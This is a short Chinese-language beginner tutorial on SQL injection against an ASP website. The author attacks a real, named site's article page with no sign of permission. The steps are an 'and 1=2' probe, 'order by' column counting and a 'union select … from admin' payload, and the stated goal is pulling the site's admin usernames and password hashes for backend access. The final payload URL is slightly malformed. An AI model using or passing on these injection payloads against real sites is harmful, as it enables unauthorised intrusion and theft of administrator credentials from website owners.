ASP注入小白教程

24k纯纯纯纯小白注入教程（大牛绕道），本人实践得到，主要是从通过注入拿到网站后台的用户名和密码。目标站已挂。。。，大家不用尝试了。

网址：http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 百度得到

用and 1=2 查看是否存在漏洞。在网址后添加and 1=2看是否页面异常。





页面显示找不到文章，说明存在漏洞。我们继续

在网址后加上order by 1
查看是否有变化



再用order by 20看看是否有变化，仍然没有？ 我们用30试试。

http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 30有变化。



好的在30之前 我们就要29试试29也出错，那继续用28。

http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 28正常，好的，28正常29出错
就说明是28了。

http://www.wuhouci.net.cn/Article_Print.aspArticleID=688 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

,19,20,21,22,23,24,25,26,27,28 from admin 

以上是语句。



OK 出来了。接下来我们用username和password替换页面存在的数字。



到此用户名和密码都爆出来了，加密形式需要解密。注入之路结束。